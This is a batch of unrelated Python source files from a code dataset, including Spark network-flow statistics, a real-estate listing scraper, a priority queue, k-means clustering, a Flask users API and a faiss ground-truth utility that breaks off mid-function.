# Set window and slide duration for flows analysis\n    flow_with_keys_windowed = flow_with_keys.window(window_duration, window_slide)\n\n    # Compute basic hosts statistics - number of flows, packets, bytes sent by a host\n    flow_ip_total_stats_no_window = flow_with_keys.map(lambda json_rdd: (json_rdd[\"ipfix.sourceIPv4Address\"], (\"total_stats\", 1, json_rdd[\"ipfix.packetDeltaCount\"], json_rdd[\"ipfix.octetDeltaCount\"])))\\\n        .reduceByKey(lambda actual, update: (\n            actual[total_stats_position[\"type\"]],\n            actual[total_stats_position[\"total_flows\"]] + update[total_stats_position[\"total_flows\"]],\n            actual[total_stats_position[\"total_packets\"]] + update[total_stats_position[\"total_packets\"]],\n            actual[total_stats_position[\"total_bytes\"]] + update[total_stats_position[\"total_bytes\"]]\n        ))\n\n    flow_ip_total_stats = flow_ip_total_stats_no_window.window(window_duration, window_slide)\\\n        .reduceByKey(lambda actual, update: (\n            actual[total_stats_position[\"type\"]],\n            actual[total_stats_position[\"total_flows\"]] + update[total_stats_position[\"total_flows\"]],\n            actual[total_stats_position[\"total_packets\"]] + update[total_stats_position[\"total_packets\"]],\n            actual[total_stats_position[\"total_bytes\"]] + update[total_stats_position[\"total_bytes\"]]\n        ))\n\n    # Compute a number of distinct communication peers with a host\n    flow_communicating_pairs_no_window = flow_with_keys.map(lambda json_rdd: ((json_rdd[\"ipfix.sourceIPv4Address\"], json_rdd[\"ipfix.sourceIPv4Address\"]+\"-\"+json_rdd[\"ipfix.destinationIPv4Address\"]), 1))\\\n        .reduceByKey(lambda actual, update: actual)\n\n    flow_communicating_pairs = flow_communicating_pairs_no_window.window(window_duration, window_slide) \\\n        .reduceByKey(lambda actual, update: actual + update)\\\n        .map(lambda json_rdd: (json_rdd[0][0], (\"peer_number\", 1)))\\\n        .reduceByKey(lambda actual, update: (\n            actual[0],\n            actual[1] + update[1]))\n\n    # Compute a number of distinct destination ports for each host\n    
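# (each (src IP, dst port) pair is first reduced to a single occurrence, then the distinct pairs are counted per host, mirroring the peer count above)\n    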
flow_dst_port_count_no_window = flow_with_keys.map(lambda json_rdd: ((json_rdd[\"ipfix.sourceIPv4Address\"], json_rdd[\"ipfix.sourceIPv4Address\"]+\"-\"+str(json_rdd[\"ipfix.destinationTransportPort\"])), 1))\\\n        .reduceByKey(lambda actual, update: actual)\n    flow_dst_port_count = flow_dst_port_count_no_window.window(window_duration, window_slide) \\\n        .reduceByKey(lambda actual, update: actual)\\\n        .map(lambda json_rdd: (json_rdd[0][0], (\"dport_count\", 1)))\\\n        .reduceByKey(lambda actual, update: (\n            actual[0],\n            actual[1] + update[1]))\n\n    # Compute an average duration of a flow in seconds for each host\n    flow_average_duration = flow_with_keys_windowed.map(lambda json_rdd: (json_rdd[\"ipfix.sourceIPv4Address\"], (1, (json_rdd[\"ipfix.flowEndMilliseconds\"]-json_rdd[\"ipfix.flowStartMilliseconds\"]))))\\\n        .reduceByKey(lambda actual, update: (\n            actual[0] + update[0],  # number of flows\n            actual[1] + update[1]  # sum of flow duration\n        ))\\\n        .map(lambda json_rdd: (json_rdd[0], (\"avg_flow_duration\", (json_rdd[1][1]/float(1000))/float(json_rdd[1][0]))))  # compute the average\n\n    # Compute TCP Flags\n    # Filter out TCP traffic\n    flow_tcp = flow_with_keys.filter(lambda json_rdd: (json_rdd[\"ipfix.protocolIdentifier\"] == 6))\n    # Compute flags statistics\n    flow_tcp_flags_no_window = flow_tcp.map(lambda json_rdd: (json_rdd[\"ipfix.sourceIPv4Address\"], (\"tcp_flags\", decimal_to_bitmap(json_rdd[\"ipfix.tcpControlBits\"]))))\\\n        .reduceByKey(lambda actual, update: (\n            actual[0],\n            [x + y for x, y in zip(actual[1], update[1])]\n        ))\n\n    flow_tcp_flags = flow_tcp_flags_no_window.window(window_duration, window_slide)\\\n        .reduceByKey(lambda actual, update: (\n            actual[0],\n            [x + y for x, y in zip(actual[1], update[1])]\n        ))\n\n    # Union the DStreams to be able to process all in one foreachRDD\n    # The structure of DStream is\n    # (src IP, ((((('total_stats', <# of flows>, <# of packets>, <# of bytes>), ('peer_number', <# of peers>)),\n    #            ('dport_count', <# number of distinct ports>)),\n    #           ('avg_flow_duration', <average flow duration>)),\n    #          ('tcp_flags', <tcp flags bitmap>))\n    # )\n    union_stream = flow_ip_total_stats.fullOuterJoin(flow_communicating_pairs)\\\n        .fullOuterJoin(flow_dst_port_count)\\\n        .fullOuterJoin(flow_average_duration)\\\n        .fullOuterJoin(flow_tcp_flags)\n\n    # Transform union_stream to parsable Dstream\n    # (src IP , (('total_stats', <# of flows>, <# of packets>, <# of bytes>), ('peer_number', <# of peers>),\n    #            ('dport_count', <# number of distinct ports>), ('avg_flow_duration', <average flow duration>), (\"tcp_flags\", <tcp flags bitmap>)))\n    parsable_union_stream = union_stream.map(lambda json_rdd: (json_rdd[0], (json_rdd[1][0][0][0][0], json_rdd[1][0][0][0][1], json_rdd[1][0][0][1], json_rdd[1][0][1], json_rdd[1][1])))\n\n    return parsable_union_stream\n\n\nif __name__ == \"__main__\":\n    # Prepare arguments parser (automatically creates -h argument).\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-iz\", \"--input_zookeeper\", help=\"input zookeeper hostname:port\", type=str, required=True)\n    parser.add_argument(\"-it\", \"--input_topic\", help=\"input kafka topic\", type=str, required=True)\n    parser.add_argument(\"-oh\", \"--output_host\", help=\"output hostname:port\", type=str, required=True)\n    parser.add_argument(\"-net\", \"--network_range\", help=\"network range to watch\", type=str, required=True)\n\n    # Parse arguments.\n    args = parser.parse_args()\n\n    # Set variables\n    application_name = os.path.basename(sys.argv[0])  # Application name used as identifier\n    kafka_partitions = 1  # Number of partitions of the input Kafka topic\n    
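# window_duration equals window_slide below, so the analysis windows are non-overlapping 10-second windows, as described in the module docstring\n    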
window_duration = 10  # Analysis window duration (10 seconds)\n    window_slide = 10  # Slide interval of the analysis window (10 seconds)\n    network_filter = args.network_range  # Filter for network for detection (regex filtering), e.g. \"10\\.10\\..+\"\n\n    # Spark context initialization\n    sc = SparkContext(appName=application_name + \" \" + \" \".join(sys.argv[1:]))  # Application name used as the appName\n    ssc = StreamingContext(sc, 1)  # Spark microbatch is 1 second\n\n    # Position of statistics in DStream.\n    # Overall structure of a record\n    statistics_position = {\"total_stats\": 0, \"peer_number\": 1, \"dport_count\": 2, \"average_flow_duration\": 3, \"tcp_flags\": 4}\n    # Structure of basic characteristics\n    total_stats_position = {\"type\": 0, \"total_flows\": 1, \"total_packets\": 2, \"total_bytes\": 3}\n    # Structure of peer number count characteristics\n    peer_number_position = {\"type\": 0, \"peer_number\": 1}\n    # Structure of destination port count characteristics\n    dport_count_position = {\"type\": 0, \"dport_number\": 1}\n    # Structure of average flow duration characteristics\n    avg_flow_duration_position = {\"type\": 0, \"avg_duration\": 1}\n    # Structure of protocol characteristics\n    tcp_flags_position = {\"type\": 0, \"tcp_flags_array\": 1}\n\n    # Initialize input DStream of flows from specified Zookeeper server and Kafka topic\n    input_stream = KafkaUtils.createStream(ssc, args.input_zookeeper, \"spark-consumer-\" + application_name, {args.input_topic: kafka_partitions})\n\n    # Parse flows in the JSON format\n    input_stream_json = input_stream.map(lambda x: json.loads(x[1]))\n\n    # Process data to the defined function.\n    host_statistics = count_host_stats(input_stream_json)\n\n    # Process computed statistics and send them to the specified host\n    host_statistics.foreachRDD(lambda rdd: process_results(rdd.collectAsMap(), args.output_host))\n\n    # Start input data processing\n    ssc.start()\n    ssc.awaitTermination()\n\n\n","sub_path":"applications/statistics/hosts_statistics/spark/host_stats.py","file_name":"host_stats.py","file_ext":"py","file_size_in_byte":17422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"623262581","text":"# Task 6 =================================================================================\n\n# Spec: Given the input data (insurance policy numbers of the clients of two\n# hospitals (lists): Alchemilla Hospital and Brookhaven Hospital).\n# Find out:\n# 1. How many clients visit both hospitals\n# 2. How many clients visit only Alchemilla Hospital\n# 3. How many clients (unique insurance policies) are in the databases of all hospitals\n# Input data: al_hospital = [123, 4325, 3567, 234, 54647, 5663]\n# Input data: bh_hospital = [688, 5653, 123, 56778, 234, 4677, 8787]\n# # To solve with and without sets\n\n# Developer notes: Solve it without using set ! 
:)\n# ========================================================================================\n\nal_hospital = [123, 4325, 3567, 234, 54647, 5663]\nbh_hospital = [688, 5653, 123, 56778, 234, 4677, 8787]\n\nboth_hospitals = 0  # How many clients visit both hospitals\nonly_al_hospital = 0  # How many clients only in Alchemilla Hospital\nonly_bh_hospital = 0  # How many clients only in Brookhaven Hospital\n\nfor a in al_hospital:\n    for b in bh_hospital:\n        if a == b:\n            both_hospitals += 1\n        else:\n            continue\n\nprint(f\"{both_hospitals} clients visit both hospitals\")\n\nfor a in al_hospital:\n    if a not in bh_hospital:\n        only_al_hospital += 1\n    else:\n        continue\n\nprint(f\"{only_al_hospital} clients visit only 'Alchemilla' hospital\")\n\nfor b in bh_hospital:\n    if b not in al_hospital:\n        only_bh_hospital += 1\n    else:\n        continue\n\nprint(f\"{only_al_hospital + both_hospitals + only_bh_hospital} unique clients across both hospitals\")\n","sub_path":"HomeWork_03_04.02.2021/HomeTask_06.py","file_name":"HomeTask_06.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"554106642","text":"#======================================================================\n#\n# This routine interfaces with Gaussian Process Regression\n# The crucial part is\n#\n#   y[iI] = solver.initial(Xtraining[iI], n_agents)[0]\n#   =>  at every training point, we solve an optimization problem\n#\n# Simon Scheidegger, 01/19\n#======================================================================\n\nimport numpy as np\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.write = lambda msg: logger.info(msg.decode('utf-8')) if msg.strip(\n) != '' else None\nimport pickle\n\nfrom . import solver_ipopt as solver\nfrom utils import stdout_redirector\nfrom estimator.gpr import GPR\n\n\ndef VFI_iter(model, V_tp1=None, num_samples = 20):\n    logger.info(\"Beginning VFI Step\")\n\n    #fix seed\n    np.random.seed(666)\n\n    #generate sample aPoints\n    dim = model.dim.state\n    Xtraining = np.random.uniform(model.params.k_bar, model.params.k_up,\n                                  (num_samples, dim))\n    y = np.zeros(num_samples, float)  # training targets\n\n    # solve bellman equations at training points\n    # with stdout_redirector(logger):\n    for iI in range(len(Xtraining)):\n        y[iI] = solver.solve(model, Xtraining[iI], V_tp1=V_tp1)[0]\n\n    # Instantiate a Gaussian Process model\n    # Fit to data using Maximum Likelihood Estimation of the parameters\n    V_t = GPR()\n    V_t.fit(Xtraining, y)\n\n    logger.info(\"Finished VFI Step\")\n\n    return V_t\n","sub_path":"solver/gpr_continuous.py","file_name":"gpr_continuous.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"124171592","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport boto3\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom urllib.request import urlretrieve\nfrom os.path import join\nimport time\n\n\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table('ut-ksl2')\n#s3 = boto3.client('s3')\n#s3.upload_fileobj(file_object, 'ut-ksl-images', 'myKey') \n\nimageDir = r'C:\\Users\\matt\\Desktop\\Houses\\ut-ksl-images'\n\n\n#\n#ses = temp.get_item(Key={'address':'123 Sesame St. Sandy UT 84070'})\n#\n#ses = temp.put_item(Item = {'address':'123 Sesame St. Sandy UT 84070','attempt':3})\n#\n#ses = temp.update_item(Key={'address':'123 Sesame St. 
Sandy UT 84070'},\n# UpdateExpression = 'SET price = :price, description = :description',\n# ExpressionAttributeValues={':price':300000,\n# ':description':'rancher'})\n#\n#\n#UpdateExpression='SET age = :val1',\n# ExpressionAttributeValues={\n# ':val1': 26\n# \n\ndef get(url, session):\n    # polite crawl delay before every request\n    time.sleep(3)\n    return session.get(url)\n\ndef getListingIdsOnPage(page):\n    'Get a list of the KSL listing identifiers on the current page of search results.'\n    pageSoup = BeautifulSoup(page, 'html.parser')\n    listingGroups = pageSoup.find_all('div', {'class':'listing-group'})\n    urls = []\n    for lg in listingGroups:\n        urls += [l.find('a').get('href') for l in lg.find_all('div',{'class':'listing'})]\n    return [int(listingId) for listingId in re.findall(pattern='/homes/listing/(\\d+)', string=' '.join(urls))]\n\n\ndef parseListing(listingId, session):\n    'Requests the page for the specified listing and returns a dict containing all the details of that listing.'\n    listingDict = {'listingId':listingId}\n    try:\n        response = get('http://www.ksl.com/homes/listing/{}'.format(listingId), session)  # use the session passed in, not a global\n        if response.status_code == 200:\n            listing = response.text\n            soup = BeautifulSoup(listing, 'html.parser')\n\n            # Parse details at top of page.\n            listingDetails = soup.find('div', {'class':'listing-details'})\n            listingDict.update({i['class'][0]:' '.join(i.text.strip().split()) for i in listingDetails.children if str(i).strip()})\n            listingDict['price'] = listingDict['price'].replace('$','').replace(',','')\n\n            # Parse Property Details Table\n            for row in soup.findAll(\"table\", { \"class\" : \"details-list\" }):\n                cells = row.find_all('td')\n                for cell in cells:\n                    cellData = cell.string\n                    try:  # Ignores completely empty cells\n                        if cellData[0] != '\\n':  # This is an actual data cell\n                            if cellData[-1] == ':':  # Dictionary key\n                                key = cellData.replace(' ','').replace(':','')\n                            else:\n                                value = cellData.replace(',','')\n                                try:\n                                    value = int(value)\n                                except ValueError:\n                                    pass\n                                if value not in ['None Specified','Not Specified','Not Applicable']:\n                                    listingDict[key] = value\n                    except TypeError:\n                        continue\n\n            listingDict['contact-name'] = soup.find('span', {'class':'contact-name'}).text\n            company = soup.find('span', {'class':'contact-company'}).text.strip()\n            if company:\n                listingDict['contact-company'] = company\n\n            listingDict['description'] = soup.find('p', {'class':'body--text'}).text\n\n            # Save images for listing to a local file. 
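            # (The commented-out boto3 client near the top of this file hints at the
            # eventual S3 upload; a minimal sketch, assuming the 'ut-ksl-images'
            # bucket from that snippet and a hypothetical object_key, would be:
            #     s3 = boto3.client('s3')
            #     s3.upload_file(local_image_path, 'ut-ksl-images', object_key)
            # boto3's upload_file takes (filename, bucket, key).)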
I'll later zip up and send them to s3.\n try: \n image = soup.find('div',{'class':'static-photo-image-container media'}).find('img')['src']\n urlretrieve('https:' + image, join(imageDir,str(listingId) + image[image.rfind('.'):]))\n except Exception:\n print('No picture found for listing {}'.format(listingId))\n pass\n return {k: v for k, v in listingDict.items() if v} # Removes dictionary entries if the values is an empty string because this causes a problem with DynamoDb import\n \n else: # Response code not 200\n return None\n except Exception:\n print('Encountered Exception on listing {}'.format(listingId))\n return None\n \n \n \ns = requests.Session()\nsearchUrl = 'http://www.ksl.com/homes/search/index?city=&state=&zip=84043&miles=50&category%5B%5D=Homes+For+Sale&priceFrom=100000&priceTo=700000&bedFQ%5B%5D=&bathFQ%5B%5D=&squareFootFQ%5B%5D=&parkingAttachedGarageFQ%5B%5D=&parkingDetachedGarageFQ%5B%5D=&parkingCarportFQ%5B%5D=&yearFrom=&yearTo=&acreFQ%5B%5D=&keyword='\n\npage = get(searchUrl,s).text\nlastPageNum = BeautifulSoup(page, 'html.parser').find('a', { 'title' : 'Go to last page' })['href'].split('=')[1]\nlistingIds = getListingIdsOnPage(page)\n\nfor pageNum in range(1,int(lastPageNum)):\n try:\n# print('Processing page {}'.format(pageNum)) # Debug\n print('Processing search page {} of {}'.format(pageNum,lastPageNum)) # Debug\n page = get('http://www.ksl.com/homes/search/index?page={}'.format(pageNum),s).text\n listingIds = listingIds + getListingIdsOnPage(page)\n except ConnectionError:\n print('Encountered connection error on {}'.format(pageNum))\n \nlistingIdList = list(listingIds)\n\nprint('Found {} listings to scrape'.format(len(listingIdList)))\n\nwith table.batch_writer() as batchWriter:\n for listingId in listingIdList:\n# print('Processing listing: ' + str(listingId)) # Debug\n item = parseListing(listingId,s)\n if item is not None:\n batchWriter.put_item(Item=item)\n else:\n print(\"Couldn't access item {}\".format(listingId))\n","sub_path":"realEstateScraper.py","file_name":"realEstateScraper.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"603782327","text":"from testsuite.base_testcase import BaseTestCase\nfrom pageobjects.forum_homepage import HomePage\nfrom pageobjects.forum_searchpage import SearchPage\nfrom pageobjects.base import BasePage\nimport unittest\nimport time\nclass SearchTest(BaseTestCase,BasePage):\n def test_search(self):\n home_page=HomePage(self.driver)\n home_page.submit('admin', '13333486358LY')\n time.sleep(3)\n search_page=SearchPage(self.driver)\n search_page.search(\"la\")\n\n base=BasePage(self)\n text=base.get_text(*search_page.search_page_button_search_title_loc)\n self.assertEqual(text,\"la\",msg=\"failed\")\n search_page.logout()\n time.sleep(4)\n\nif __name__==\"__main__\":\n unittest.main()","sub_path":"testsuite/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"105454917","text":"\"\"\"\n\n\"\"\"\nfrom chapterNine.HeapPriorityQueue import HeapPriorityQueue\n\nclass AdaptableHeapPriorityQueue(HeapPriorityQueue):\n\n\n class Locator(HeapPriorityQueue._Item):\n\n __slots__ = '_index'\n\n # override the _Item inner class, pass key val to base constructor,\n # initialize instance variable index from subclass constructor arg j\n def __init__(self, k, v, j):\n super().__init__(k, v)\n self._index = 
j\n\n\n    # ------------------------- Non Public Behavior ------------------------- #\n\n    def _swap(self, i, j):\n        \"\"\"\n        called from the parent class during upheap/downheap; performs the\n        parent class swap, then resets the index stored in each Locator so\n        that any Locator instance the client still holds stays in sync\n        :param i:\n        :param j:\n        :return:\n        \"\"\"\n        super()._swap(i, j)\n        self._data[i]._index = i  # reset locator index\n        self._data[j]._index = j  # reset locator index\n\n    def _bubble(self, j):\n        \"\"\"\n        move the entry at index j up or down until the heap order is restored\n        :param j:\n        :return:\n        \"\"\"\n        # bubble the locator up or down in the array\n        if j > 0 and self._data[j] < self._data[self._parent(j)]:\n            self._upheap(j)\n        else:\n            self._downheap(j)\n\n    # ------------------------- Public Behavior ------------------------- #\n\n    def add(self, key, val):\n        \"\"\"\n        time complexity -> worst case O(log n)\n        add a key value pair\n        :param key:\n        :param val:\n        :return:\n        \"\"\"\n        # adds a Locator to the end of the list and performs the upheap, which calls the overridden _swap\n        token = self.Locator(key, val, len(self._data))\n        self._data.append(token)\n        self._upheap(len(self._data) - 1)  # upheap the token from where it was placed until it satisfies the heap-order property\n        return token\n\n    def update(self, loc, newkey, newval):\n        \"\"\"\n        update the key and value for the entry identified by the Locator loc\n        :param loc:\n        :param newkey:\n        :param newval:\n        :return:\n        \"\"\"\n        j = loc._index\n        # validate that loc is a live locator for this heap: its index must be\n        # in range and the entry stored at that index must be this very instance\n        if not (0 <= j < len(self) and self._data[j] is loc):\n            raise ValueError(\"invalid location error\")\n        loc._key = newkey\n        loc._value = newval\n        self._bubble(j)\n\n    def remove(self, loc):\n        \"\"\"\n        remove and return the (k, v) pair identified by the Locator loc\n        :param loc:\n        :return:\n        \"\"\"\n        j = loc._index\n        if not (0 <= j < len(self) and self._data[j] is loc):\n            raise ValueError(\"invalid location instance provided for heap\")\n        # if the index is the last element in the array storage, just pop it; 
this would be\n # right most bottom level element in the heap\n if j == len(self) - 1:\n self._data.pop()\n else:\n self._swap(j, len(self) - 1) # swap item to the last position\n self._data.pop() # pop it off\n self._bubble(j) # fix item displaced by the swap which is at index j\n return loc._key, loc._value\n\n\n\n\ntest = AdaptableHeapPriorityQueue()\n\nfirst = test.add(5, \"test\")\nprint(first._index)\nsecond = test.add(2, \"next time\")\nprint(second._index)\nprint(first._index)\n\n","sub_path":"chapterNine/AdaptableHeapPriorityQueue.py","file_name":"AdaptableHeapPriorityQueue.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"388709007","text":"import requests\nimport threading\nimport os\n\nclass GithubRequestThread:\n def __init__(self, username):\n self.username = username\n\n self.thread = threading.Thread(target=self.run, args=())\n self.thread.daemon = True\n self.thread.start()\n\n def run(self):\n r = requests.get('https://api.github.com/users/%s' % self.username)\n result = r.json()\n\n print(\"RESULT: \"+result[\"name\"])\n print(\"RESULT: \"+result[\"location\"])\n\n\nthreads = [\n GithubRequestThread(os.environ[\"GITHUB_USER_1\"]),\n GithubRequestThread(os.environ[\"GITHUB_USER_2\"])\n]\n\nprint(\"INFO: All threads are started\")\n\nfor thread in threads:\n print(\"INFO: Waiting for user '%s' request.\" % thread.username)\n thread.thread.join()\n\nprint(\"INFO: All threads completed\")\n","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"151715821","text":"from __future__ import print_function\n\nimport re\nimport sys\nfrom operator import add\nimport numpy as np\n\nfrom pyspark.sql import SparkSession\n\ndef parseNeigh(lines):\n parts = re.split(r',', lines)\n return np.array([parts[0],parts[1],parts[2],parts[3]])\n\ndef closestPoint(pq, centers):\n p=pq[1:].astype('float64')\n #print(\"1\")\n bestIndex = 0\n closest = float(\"+inf\")\n for i in range(len(centers)):\n tempDist = np.sum((p - centers[i]) ** 2)\n if tempDist < closest:\n closest = tempDist\n bestIndex = i\n #return p\n return bestIndex\n\ndef centro(x):\n #print(type(x))\n l=0\n for i in x:\n l=len(i)-1\n break\n a=np.zeros(l)\n c=0\n for k in x:\n c+=1\n i=k[1:].astype('float64')\n for j in range(l):\n a[j]+=i[j]\n for i in range(l):\n a[i]/=c\n return a\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: kmeans \", file=sys.stderr)\n sys.exit(-1)\n\n # Initialize the spark context.\n spark = SparkSession\\\n .builder\\\n .appName(\"K-Means\")\\\n .getOrCreate()\n\n lines = spark.read.text(sys.argv[1]).rdd.map(lambda r: r[0])\n data = lines.map(lambda lin: parseNeigh(lin)).cache()\n K=int(sys.argv[2])\n convergeDist = float(sys.argv[3])\n kPoints=data.takeSample(False,K,1)\n z=[]\n for i in kPoints:\n z.append([float(k) for k in i[1:]])\n for i in range(50):\n clcs=data.map(lambda x: (closestPoint(x,z),x)).groupByKey()\n '''for x,y in clcs.collect():\n print(x,y)\n '''\n abc=clcs.map(lambda x:(x[0],centro(x[1])))\n \n '''for x,y in abc.collect():\n print(x,y)'''\n for x,y in abc.collect():\n z[x]=y\n for i,j in clcs.collect():\n for x in j:\n print(x[0],\",\",i,sep=\"\")\n 
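    # Note: convergeDist is read from argv above but the loop always runs a
    # fixed 50 iterations. A hedged sketch of a distance-based stopping test
    # for the loop above (assuming new_z is a hypothetical list holding the
    # iteration's recomputed centers):
    #
    #     tempDist = sum(np.sum((np.array(z[i]) - np.array(new_z[i])) ** 2)
    #                    for i in range(K))
    #     if tempDist < convergeDist:
    #         break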
spark.stop()\n","sub_path":"Clustering/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"573980834","text":"#!/usr/bin/python3\n\"\"\"\n Manage the RESTfull API for users\n\"\"\"\nfrom flask import jsonify, abort, request\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.amenity import Amenity\nfrom models.base_model import BaseModel\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\nfrom models.state import State\nfrom models.user import User\n\n\n@app_views.route(\"/users\", strict_slashes=False,\n methods=['GET'])\ndef users():\n \"\"\"Display all the users\"\"\"\n return jsonify([user.to_dict() for user in storage.all(User).values()])\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['GET'])\ndef get_user_id(user_id):\n \"\"\"Display the user matched by id\"\"\"\n user_by_id = storage.get(User, user_id)\n if user_by_id is not None:\n return jsonify(user_by_id.to_dict())\n abort(404)\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['DELETE'])\ndef delete_user_id(user_id):\n \"\"\"Delete the user matched by id\"\"\"\n user_by_id = storage.get(User, user_id)\n if user_by_id is not None:\n storage.delete(user_by_id)\n storage.save()\n return jsonify({}), 200\n abort(404)\n\n\n@app_views.route(\"/users\", strict_slashes=False,\n methods=['POST'])\ndef post_user():\n \"\"\"Create a new user\"\"\"\n json_req = request.get_json()\n if not json_req:\n abort(400, 'Not a JSON')\n if 'email' not in json_req:\n abort(400, 'Missing email')\n if 'password' not in json_req:\n abort(400, 'Missing password')\n new_user = User(**request.get_json())\n storage.new(new_user)\n storage.save()\n return jsonify(new_user.to_dict()), 201\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['PUT'])\ndef put_user_id(user_id):\n \"\"\"Update a user in database\"\"\"\n json_req = request.get_json()\n if not json_req:\n abort(400, 'Not a JSON')\n user_by_id = storage.get(User, user_id)\n if user_by_id is not None:\n for attr, value in request.get_json().items():\n if (hasattr(user_by_id, attr) and\n attr != 'id' and attr != 'created_at' and\n attr != 'updated_at') and attr != 'email':\n setattr(user_by_id, attr, value)\n storage.save()\n return jsonify(user_by_id.to_dict()), 200\n abort(404)\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"342936742","text":"import array\nimport logging\nimport os\nimport subprocess\nimport time\nfrom os.path import join\n\nimport scipy.sparse as sp\n# from mtest.utils.data import load_csr, save_csr\nfrom tqdm import tqdm\n\nimport faiss\n# from ..utils.data import load_sift, save_sift\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nGT_IP_FNAME = 'sift_groundtruth.IP.ivecs'\nGT_IP_TXT = 'data.labels.txt'\nMAGIC_NUM = -90378\n\n\ndef generate_gt(data, path, skip_tests=False):\n logger.info(\"Generating data to be stored at {}\".format(join(path, GT_IP_FNAME)))\n\n if not isinstance(data, tuple):\n data = _load(str(data))\n\n logger.debug(f'Preparing the index')\n\n xt, xb, xq, gt = data\n\n d = xt.shape[1]\n k = gt.shape[1]\n\n indexIP = faiss.IndexFlatIP(d)\n indexIP.add(xb)\n\n logger.debug('Trainig the index')\n\n _, I = indexIP.search(xq, k)\n\n 
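    # search() on a faiss flat index returns (distances, indices), each of
    # shape (num_queries, k); only the id matrix I is kept here. A tiny
    # self-contained illustration on random data (not part of this pipeline):
    #
    #     import numpy as np, faiss
    #     xb = np.random.rand(1000, 64).astype('float32')
    #     idx = faiss.IndexFlatIP(64)
    #     idx.add(xb)
    #     D, I = idx.search(xb[:5], 10)   # D: (5, 10) scores, I: (5, 10) ids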
logger.debug('Predictions ready')\n\n # ignore all but the best vector\n I[:, 1:] = MAGIC_NUM\n\n _save(I, path)\n\n # sanity-check\n if not skip_tests:\n logger.info(\"Testing for inner-product ground-truth\")\n _test_gt((xt, xb, xq, I))\n\n\ndef prepare_ft(path_in, path_out, force=False):\n os.makedirs(path_out, exist_ok=True)\n\n logger.debug('Preparing train csr')\n (X_tr,\n Y_tr,\n w_mask,\n l_mask) = load_libsvm(path_in, 'train', min_words=3, min_labels=3, force=force)\n\n logger.debug('Preparing test csr')\n (X_te,\n Y_te,\n _,\n __) = load_libsvm(path_in, 'test', words_mask=w_mask, labels_mask=l_mask, force=force)\n\n logger.debug('Preparing ft')\n to_ft(X_tr, Y_tr, os.path.join(path_out, 'train.ft.txt'))\n to_ft(X_te, Y_te, os.path.join(path_out, 'test.ft.txt'))\n\n\ndef load_GT(path):\n G = []\n\n for line in open(path):\n row = [int(y) for y in line.split()]\n G += [{y for y in row\n if y >= 0}]\n\n return G\n\n\ndef load_sift(fname, dtype=np.float32):\n data = np.fromfile(fname, dtype=dtype)\n d = data[0].view(np.int32)\n\n data = data.reshape(-1, d + 1)[:, 1:]\n data = np.ascontiguousarray(data.copy())\n\n return data\n\n\ndef save_sift(obj, fname, dtype=np.float32):\n obj = np.hstack([\n np.ones((obj.shape[0], 1)) * obj.shape[1],\n obj\n ]).astype(dtype)\n\n obj.tofile(fname)\n\n\ndef _load(path):\n logger.debug(f'Loading {path}')\n\n xt = load_sift(join(path, \"sift_learn.fvecs\"))\n xb = load_sift(join(path, \"sift_base.fvecs\"))\n xq = load_sift(join(path, \"sift_query.fvecs\"))\n gt = load_sift(join(path, \"sift_groundtruth.ivecs\"), dtype=np.int32)\n\n return xt, xb, xq, gt\n\n\ndef _save(I, path):\n logger.debug(f'saving {GT_IP_FNAME}')\n save_sift(I, join(path, GT_IP_FNAME), dtype=np.int32)\n\n logger.debug(f'saving {GT_IP_TXT}')\n with open(join(path, GT_IP_TXT), 'w') as f:\n\n for row in tqdm(I):\n row = ' '.join([str(item) for item in row])\n print(row, file=f)\n\n\ndef _eval(index, xq, gt, prefix=\"\"):\n nq, k_max = gt.shape\n\n for k in [1, 5, 10]:\n t0 = time.time()\n D, I = index.search(xq, k)\n t1 = time.time()\n\n recall_at_1 = (I[:, :1] == gt[:, :1]).sum() / float(nq)\n\n print('\\t' + prefix + \": k={} {:.3f} s, R@1 {:.4f}\".format(k, t1 - t0, recall_at_1))\n\n\ndef _test_gt(data):\n logger.debug('Testing')\n\n xt, xb, xq, gt = data\n\n d = xt.shape[1]\n\n for Index in [faiss.IndexFlatIP, faiss.IndexFlatL2]:\n index = Index(d)\n index.add(xb)\n\n _eval(index, xq, gt, prefix=index.__class__.__name__)\n\n\ndef libsvm_to_csr(path):\n with open(path) as f_in:\n\n num_documents, num_features, num_labels = [int(val) for val in\n next(f_in).strip().split(' ')]\n\n y_indices = array.array('I')\n y_indptr = array.array('I', [0])\n\n x_indices = array.array('I')\n x_data = array.array('f')\n x_indptr = array.array('I', [0])\n\n with 